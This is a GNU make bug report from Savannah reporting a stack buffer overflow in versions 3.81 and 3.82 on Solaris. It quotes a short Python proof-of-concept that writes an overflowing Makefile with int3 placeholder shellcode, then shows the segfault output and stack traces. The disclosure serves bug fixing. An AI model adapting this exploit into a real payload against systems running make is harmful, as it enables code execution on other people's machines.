URL:
<http://savannah.gnu.org/bugs/?35525>
Summary: buffer overflow in make
Project: make
Submitted by: mike_s
Submitted on: Mon 13 Feb 2012 08:05:18 PM GMT
Severity: 3 - Normal
Item Group: Bug
Status: None
Privacy: Public
Assigned to: None
Open/Closed: Open
Discussion Lock: Any
Component Version: 3.81
Operating System: POSIX-Based
Fixed Release: None
Triage Status: None
_______________________________________________________
Details:
as I kinda watch over gnu make in Solaris, this was pointed out to me (and I
didn't find an open bug - feel free to close
if there is one):
http://www.mail-archive.com/bug-make@gnu.org/msg05105.html
the provided python script indeed causes core dumps on
x86 and sparc Solaris 11. 3.82 on x86 didn't, which made
me hopeful, but it did on sparc so I guess I just got lucky.
in 3.81:
{mike_s:doomsday:39} cat makeexploit.py
#Alfredo A. Ortega - Core Security Exploit Writers Team (EWT)
#GNU Make stack overflow
#This Python script generates a Makefile that trigger the overflow
#and executes a int3 instruction (SIGTRAP)
#Tested on FreeBSD-6.2-RELEASE
#usage: python makeexploit.py >Makefile;gmake
import os
#ShellCode placeholder
overflow='\xcc'*1052
#Address
overflow+='\xbf'*4
print "all: %s" % overflow
{mike_s:doomsday:40} gmake
gmake: stat:
������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������:
File name too long
Segmentation fault (core dumped)
{mike_s:doomsday:41} pstack core
core 'core' of 6016: gmake
0002244c pattern_search (675bb, fff92b02, 0, 1, 3, 0) + d40
00021678 try_implicit_rule (6cca0, 3, 604ac, 0, 1000000, 54c00) + 4c
000328e4 update_file_1 (6cca0, 2, 10040000, 604a0, ff28fa23, 4) + 374
00032210 update_file (6cca0, 2, 6cca0, 0, 54c00, 6082c) + b4
000341a4 check_dep (0, 1, 10, 0, ffbfe8cc, 6cca0) + 3b0
00032ba4 update_file_1 (67390, 6cca0, 0, 4000000, 0, 1) + 634
00031ab4 update_goal_chain (0, 6c2c0, 67390, 0, 54c00, 67390) + 21c
00028ff8 main (61530, 0, 0, 60860, 61, 40f6c) + 2b00
00015fc8 _start (0, 0, 0, 0, 0, 0) + 108
in 3.82 (not sure that will help, but that area seemed to
change a bit):
{mike_s:doomsday:42} /usr/local/bin/gmake
gmake: stat:
������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������:
File name too long
Bus error (core dumped)
{mike_s:doomsday:43} pstack core
core 'core' of 6019: /usr/local/bin/gmake
00020a10 try_implicit_rule (1, 3, 3afc0, 5b940, 0, 1) + 38
0002e5e8 update_file (3, 2, 0, 0, 0, 64770) + e24
0002ecd0 check_dep (64770, 2, 0, 1, ffbfe944, 1) + 3c
0002dd30 update_file (1, 0, 4cc00, 1, 0, 5b680) + 56c
0002f2b4 update_goal_chain (ffffffff, 5b680, 0, 0, 0, 1) + 118
000267d4 main (1, ffbff6a4, 0, 1, 0, 38c00) + 1534
00015b20 _start (0, 0, 0, 0, 0, 0) + 5c
_______________________________________________________
Reply to this item at:
<http://savannah.gnu.org/bugs/?35525>
_______________________________________________
Message sent via/by Savannah
http://savannah.gnu.org/
_______________________________________________
Bug-make mailing list
Bug-make@gnu.org
https://lists.gnu.org/mailman/listinfo/bug-make
